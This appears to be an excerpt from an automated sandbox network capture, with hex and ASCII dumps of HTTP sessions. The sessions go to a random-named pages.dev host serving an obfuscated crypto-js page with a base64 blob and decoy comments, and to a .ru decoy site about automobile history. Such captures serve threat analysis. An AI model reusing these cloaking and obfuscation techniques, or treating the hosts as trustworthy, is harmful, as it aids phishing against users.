                                                                2024-08-27 18:11:28 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.549741172.66.44.1454436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:28 UTC397OUTGET /favicon.ico HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:28 UTC784INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:28 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfIWVFisU%2BytcDNmOizUY7Viz553l7hnWbVBlfS1xcrtg6DoTEX8SGGvZJFsZC2htN3a0kWzjUOIXO9lvncppGx3vhE8YFat3nC7Q3un3WsESFtTJApAxr82PfY%2BTWm0LM81Gh%2FEFZn%2B7TiETV2DbM8umUTnO%2FOmolbcKyFTmp6p9K6XzUjXftw3jgwkSxopMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e0637a9c9b9c5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 31 36 2e 35 25 2c 20 37 36 2e 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 32 38 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 33 39 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 33 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 2e 30 35 29 3b 7d 33 33 25 20 7b
                                                                Data Ascii: tion: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@keyframes cal-bounce {0%, 100%, 16.5%, 76.1% {transform: translateY(151px) scaleY(1);}28% {transform: translateY(39px) scaleY(1);}31% {transform: translateY(51px) scaleY(1.05);}33% {
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 30 29 3b 7d 31 34 2e 35 25 2c 20 37 36 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 7d 23 62 61 63 6b 64 72 6f 70 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 6c 61 63 6f 6e 69 63 20 7b 77 69 64 74 68 3a 20 39 36 70 78 3b 68 65 69 67 68 74 3a 20 39 36 70 78
                                                                Data Ascii: rames closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rotate3d(1, 0, 0, 0);}14.5%, 76% {transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}}#backdrop {width: 130px;height: 107px;overflow: hidden;}.laconic {width: 96px;height: 96px
                                                                2024-08-27 18:11:28 UTC1369INData Raw: 72 65 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 69 66 65 e2 80 99 73 20 6a 6f 75 72 6e 65 79 20 69 73 20 62 65 73 74 20 65 78 70 65 72 69 65 6e 63 65 64 20 62 65 68 69 6e 64 20 74 68 65 20 77 68 65 65 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6c 61 62 6f 72 65 64 28 79 61 63 68 74 69 6e 67 29 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 74 68 65 20 72 68 79 74 68 6d 20 6f 66 20 6c 69 66 65 20 69 6e 20 6d 6f 74 69 6f 6e 2e 20 2d
                                                                Data Ascii: re"><div id="backdrop"><div class="laconic"></div></div></div></div>... <span>Lifes journey is best experienced behind the wheel.</span> --> </body><script> async function labored(yachting) { ... Driving is the rhythm of life in motion. -
                                                                2024-08-27 18:11:28 UTC474INData Raw: 7a 4f 44 56 6a 5a 57 49 32 4d 47 51 79 4e 32 46 6d 59 6a 41 35 4d 6a 4d 78 59 7a 52 6b 5a 44 45 34 4e 7a 6b 7a 4e 6a 46 6d 59 7a 51 34 5a 44 56 69 4f 54 64 6b 4d 6a 63 30 4d 54 4d 30 4d 6d 4a 6a 4e 54 42 6b 4d 44 41 33 4f 54 64 6d 4e 7a 4e 68 4f 54 42 6d 4d 6a 46 6c 4d 57 49 32 5a 54 51 79 4e 57 4d 30 4e 6a 67 77 4e 57 4d 32 4d 6a 45 79 4f 44 45 30 4e 32 4e 6c 4f 47 56 6d 59 57 55 31 4f 54 68 6d 4e 32 55 32 4d 44 49 31 5a 54 68 6d 49 69 77 69 5a 43 49 36 49 6a 5a 68 4e 6a 45 32 59 7a 5a 6d 4e 7a 41 33 4f 53 4a 39 60 29 29 2c 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 61 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 79 6f 75 20 61 6e 64 20 74 68 65 20 72 6f 61 64 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                                                Data Ascii: zODVjZWI2MGQyN2FmYjA5MjMxYzRkZDE4NzkzNjFmYzQ4ZDViOTdkMjc0MTM0MmJjNTBkMDA3OTdmNzNhOTBmMjFlMWI2ZTQyNWM0NjgwNWM2MjEyODE0N2NlOGVmYWU1OThmN2U2MDI1ZThmIiwiZCI6IjZhNjE2YzZmNzA3OSJ9`)), { ... Driving is a conversation between you and the road. --> m
                                                                2024-08-27 18:11:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.549749104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:31 UTC340OUTGET // HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:32 UTC653INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dQ%2Fm9zphXXJ0gKhWj64HV2BktpOfmyUPFQFJBk66HLE2HNXwAmFfC29vmnwz%2FTDbI8DWJTJOwNHpWvnVzjKJBN8bzK1k5RDSLqkba2rfniWyfbMNDdVhxLpaGK8qBFTBIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e064c4b1f42af-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:32 UTC716INData Raw: 31 61 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 75 74 6f 6d 6f 62 69 6c 65 20 48 69 73 74 6f 72 79 20 46 61 6e 73 20 2d 20 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74
                                                                Data Ascii: 1adf<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Automobile History Fans - glansaolksnu.ru</title> <link href="https://cdn.jsdelivr.net
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: color: white; padding: 150px 0; text-align: center; } .content-section { padding: 60px 0; } .footer { background: #343a40; color: white;
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 73 65 72 76 69 63 65 73 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: ="nav-link" href="https://glansaolksnu.ru/#about">About</a> </li> <li class="nav-item"> <a class="nav-link" href="https://glansaolksnu.ru/#services">Services</a> </li>
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 65 36 65 31 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 35 31 39 2d 31 36 35 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 43 61 72 73 20 61 72 65 20 74 68 65 20 73 63 75 6c 70 74 75 72 65 73 20 6f 66 20 6f 75 72 20 65 76 65 72 79 64 61 79 20 6c 69 76 65 73 2e 20 2d 20 43 68 72 69 73 20 42 61 6e 67 6c 65 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d
                                                                Data Ascii: e6e1">[email&#160;protected]</span></a> or call us at 777-519-1655.</p> <blockquote class="blockquote"> <p class="mb-0">Cars are the sculptures of our everyday lives. - Chris Bangle</p> </blockquote>
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20 64 65 73 69 67 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 6d 6f 64 65 72 6e 2d 73 75 70 65 72 63 61 72 73 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 52 65 61 64 20 4d 6f 72 65 3c
                                                                Data Ascii: percars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and design.</p> <a href="https://glansaolksnu.ru/#modern-supercars" class="btn btn-primary">Read More<
                                                                2024-08-27 18:11:32 UTC695INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 66 61 71 22 3e 46 41 51 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e
                                                                Data Ascii: <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#terms">Terms</a> </li> <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#faq">FAQ</a> </li>
                                                                2024-08-27 18:11:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.549750172.66.47.1114436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:31 UTC670OUTGET /, HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:32 UTC784INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:32 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2woJQsQZTveYhC%2BCMsOAmNqQqcQA7H9aR5qx9K6ktoDh09UoAK5sIFW%2FeIOpkyBUWJfyBKETFjxACYC7ruQL99AJxu53m86HiRP%2F2uVb8ag%2B9ZQ3a12XUrURqo%2BE0PefkrCKVvvgiUkAUTwUbms7IL03WMjd7UHJhDKp3S1zbpWCueVC7A4djvl7G9owjnOUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e064cbc7d42fd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 31 36 2e 35 25 2c 20 37 36 2e 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 32 38 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 33 39 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 33 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 2e 30 35 29 3b 7d 33 33 25 20 7b
                                                                Data Ascii: tion: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@keyframes cal-bounce {0%, 100%, 16.5%, 76.1% {transform: translateY(151px) scaleY(1);}28% {transform: translateY(39px) scaleY(1);}31% {transform: translateY(51px) scaleY(1.05);}33% {
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 30 29 3b 7d 31 34 2e 35 25 2c 20 37 36 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 7d 23 62 61 63 6b 64 72 6f 70 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 6c 61 63 6f 6e 69 63 20 7b 77 69 64 74 68 3a 20 39 36 70 78 3b 68 65 69 67 68 74 3a 20 39 36 70 78
                                                                Data Ascii: rames closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rotate3d(1, 0, 0, 0);}14.5%, 76% {transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}}#backdrop {width: 130px;height: 107px;overflow: hidden;}.laconic {width: 96px;height: 96px
                                                                2024-08-27 18:11:32 UTC1369INData Raw: 72 65 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 69 66 65 e2 80 99 73 20 6a 6f 75 72 6e 65 79 20 69 73 20 62 65 73 74 20 65 78 70 65 72 69 65 6e 63 65 64 20 62 65 68 69 6e 64 20 74 68 65 20 77 68 65 65 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6c 61 62 6f 72 65 64 28 79 61 63 68 74 69 6e 67 29 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 74 68 65 20 72 68 79 74 68 6d 20 6f 66 20 6c 69 66 65 20 69 6e 20 6d 6f 74 69 6f 6e 2e 20 2d
                                                                Data Ascii: re"><div id="backdrop"><div class="laconic"></div></div></div></div>... <span>Lifes journey is best experienced behind the wheel.</span> --> </body><script> async function labored(yachting) { ... Driving is the rhythm of life in motion. -
